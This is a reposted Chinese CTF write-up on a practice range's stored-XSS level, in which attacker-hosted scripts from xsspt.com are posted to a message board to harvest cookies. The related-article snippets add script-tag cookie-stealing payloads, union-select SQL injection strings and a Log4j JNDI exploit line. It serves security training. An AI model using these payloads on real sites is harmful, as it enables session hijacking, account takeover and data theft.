ctf实战 封神台的靶场 第四关通关记录

最新推荐文章于 2023-08-15 16:35:02 发布
最新推荐文章于 2023-08-15 16:35:02 发布
阅读量1.1k 收藏
点赞数
原文链接:http://www.cnblogs.com/jackzz/p/10934779.html
版权

发现留言板功能,顺手试下反射型xss代码,结果成功的弹窗了

网上的xss平台:http://xsspt.com,需要自己去注册和登录,反正账号密码知道就行了,邮箱反正不验证不建议写真实的。

我们先建立项目,名称什么乱选都行,就是选择模块的时候记得选取这两个

然后你可以看到一叠代码,这个就是两个模块中的XSS Payload。把生成的存储型xss链接放入留言板提交成功后到xss平台等查收用户cookies ip信息(cookie劫持盗用风险,冒用用户登陆、支付等)。

 

 

转载于:https://www.cnblogs.com/jackzz/p/10934779.html

weixin_30437847
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF 实战选择题
02-28
CTF 实战 选择题,带答案 编辑版
神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)
m0_65712192的博客
10-19 1689
神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)
CTF实战练习:文件上传漏洞+文件包含漏洞
烟雨天青色
08-06 1万+
BugkuCTF:文件包含2 CTF实战练习:http://120.78.xx.xxx:8013 这道题目看起来又像是跟前一道题是差不多的样子,继续先查看index.php里面的内容: 哎~这次好像显示的并不是base64编码的内容,但是感觉起来这个信息一点用都没有,第二步,查看网页源代码: 从网页源代码里我们可以看出在JS脚本里包含了一个html页面,我们现在来访问一下这个页...
upload-labs 第四-第九方法
qq_62673514的博客
02-23 1030
upload-labs 第四-第九方法
LampSecurity-CTF4 靶场记录
m0_52729465的博客
08-15 174
1、首先进行常规nmap扫描,发现四个端口,22,25,80,631。2、打开web界面,发现不像是英语,而是其他语言,没有可利用信息,再查看–script-vuln扫出来的信息发现可能存在sql注入漏洞,测试后发现存在sql注入漏洞。3、使用sqlmap对数据库进行注入,查看到user表中的数据,里面有六组账号密码,尝试使用ssh登录。4、在ssh登录过程中发现报错,查看报错信息是服务器和客户端的算法不一致导致无法登录,在ssh后面将报错内提供的算法写进参数即可正常使用ssh。
ctf实战 掌控安全的靶场 第四通关记录
wh1te 小白的博客
09-20 1709
掌控安全神台第四 根据提示为存储型xss flag在cookie中 xss平台其实网上就有 可以直接用 xsspt.com  xss平台大致如下 点击创建项目输入项目名字 选择模块是要注意选择 默认模块和xss.js 生成代码  将xss语句插入到留言板中 即可在xss平台中接收到平台模拟的管理员访问记录  得到flag 通关...
04.实验吧CTF实战之WEB渗透和隐写术解密1
08-03
【网络安全自学篇】WEB渗透与隐写术解密——实验吧CTF实战解析 在网络安全领域,WEB渗透是指通过寻找并利用网站应用的漏洞来获取未经授权的访问或控制权限。而隐写术则是指在图像、音频或其他媒体中隐藏信息的技术...
记录ctf解题过程及脚本.zip
10-25
记录ctf解题过程及脚本
2021CTF工业信息安全大赛第二场.rar
09-19
【标题】"2021CTF工业信息安全大赛第二场.rar"是一个压缩包,它包含了2021年CTF(Capture The Flag)工业信息安全大赛的第二轮比赛的相材料。CTF是一种信息安全竞赛,参赛者通常需要通过解谜、破解密码、逆向工程...
神台基础靶场 显错注入1-4
weixin_46578840的博客
06-24 283
第一题,单双引号没区别,可能不是字符型 1 and 1=1 //页面正常 1 and 1=2 //页面错误,数字型注入 判断列数 1 and 1=1 order by 1,2,3 //回显,存在三列。 判断回显位 1 and 1=2 union select 1,2,3 //23为回显位 注出当前数据库 1 and 1=2 union select 1,2,(database()) --+ 注表 1 and 1=2 union select 1,2,group_concat(table_name) fro
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
神台XSS实验
身高两米不到的博客
03-17 1110
0x01 缘起 想象一个场景:黑客发现一个网站存在XSS漏洞,于是搭建一个XSS接收平台,只要对方网站管理员登录或者巡查就能获取到他的cookie,从而完成免密登录导致网站失陷。 最近研究在pikachu靶场xss盗取cookie,但感觉效果不好。今天打靶场恰巧遇到一个非常凸显XSS危害场景从而学习记录神台 - 掌控安全在线演练靶场,是一个在线黑客攻防演练平台。 0x02 排雷 这里是第三,登入界面一看到留言板内容框,条件反射想到XSS,弹窗尝试发现确实存在XSS漏洞。 但到这里,经
神台-第四章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马 实战演练】
08-04 2087
题目: Tips: 1、通过修改Cookie登录后台(没用重打) 2、上传SHELL!3、Flag在web根目录(flag.php) 3.上传图片时建议上传小文件,我建议用QQ表情 尤里通过XSS终于得到了管理员Cookie,在修改了cookie后尤里直接绕过了登录密码,看到了后台功能! 接下来要做的,就是找一个上传点,上传自己的shell了! ...
掌控者-神台-Apache Log4j任意代码执行复现
weixin_43821278的博客
04-06 5631
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 Apache Log4j任意代码执行复现一、工具二、靶场三、步骤总结 一、工具 JNDIExploit-1.2-SNAPSHOT.jar 二、靶场 看网页源码 猜测就是username和password为注入点 三、步骤 vps有java环境 java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps的IP 成功运行 向密码框填入${jndi:ldap://vps的IP:1389/Basic/Comm.
神台-掌控者新靶场 - Kali系列4题
weixin_43821278的博客
03-11 1万+
靶场 - Kali系列【4题】 Kali渗透 - Sqlmap实操靶场
mbp 神台靶场 四 (笔记)
qq_43558415的博客
02-09 576
打开链接,发现是个留言板,尝试xss注入,看看是否可行。 弹出1提示并发现字段变灰,说明注入成功,登录xss平台创建项目。 将此代码段植入刚才的区域中<script src=http://xsspt.com/2gVqle></script>然后查看项目内容发现flag 总结:本主要是通过xss注入拿到管理员cookie的,见框就插是xss注入的常用手段,它主要通过用户输入...
神台靶场 第一章:为了女神小芳!writeup
热门推荐
Sk1y的博客
02-15 2万+
神台靶场 第一章:为了女神小芳! 题目简述: 神台靶场,题目链接 解题过程: 首先是这样的url为: http://59.63.200.79:8003/ 当点击点击查看新闻时,相应的url变化,变为如下: http://59.63.200.79:8003/?id=1 ...
神台----尤里的复仇I-第四章:为了更多的权限!留言板!!
正在学习的路上...
07-18 1090
本章主要是xss平台使用,很简单。 自己搭建xss平台或者网上随便找个平台注册使用。 新建个项目,建好后,将下面代码复制到留言板里。 提交,即可。去XSS平台接收消息。 提交,完成。 ...
神台-第四章 为了更多的权限!留言板
ploto_cs的博客
09-27 1189
神台-第四章 为了更多的权限!留言板 1.进入留言的页面,测试弹窗 根据提示为存储型XSS 测试语句为 可以看到成功弹窗 2.搭建xss平台 随意注册一个账户 https://xsspt.com/index.php?do=login 配置前两个必须选 复制语句: </textarea>'"><script src=https://xsspt.com/ZIVFnr?1601173210></script> 3.测试新语句 4.在xss平台看截取
ctf实战从入门到提升 pdf
最新发布
01-06
CTF实战从入门到提升》PDF是一本于网络安全竞赛CTF(Capture The Flag)的实战指南。该书通过系统地介绍CTF比赛的基础知识、技巧和实战经验,帮助读者从入门阶段逐步提升自己的技能。 首先,该书从CTF比赛的基本概念和常见赛制入手,帮助读者了解CTF比赛的基本原理和组成部分。接着,针对CTF比赛中常见的题型和攻击手段,提供了具体的解题思路和实战经验,帮助读者学习如何有效地解决各种网络安全问题。 另外,该书还详细介绍了CTF比赛中常用的工具和技术,包括渗透测试、漏洞利用、逆向工程等,帮助读者系统地学习和掌握实战技能。 除此之外,该书还介绍了一些CTF比赛中常见的漏洞和安全机制,并提供了针对性的解决方案和技巧,帮助读者更好地理解和应对各种安全挑战。 总的来说,《CTF实战从入门到提升》PDF是一本系统全面的CTF实战指南,适合各个阶段的读者阅读。无论是初学者还是有一定经验的玩家,都可以通过阅读这本书,提升自己的网络安全技能,更好地参与和享受CTF比赛的乐趣。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值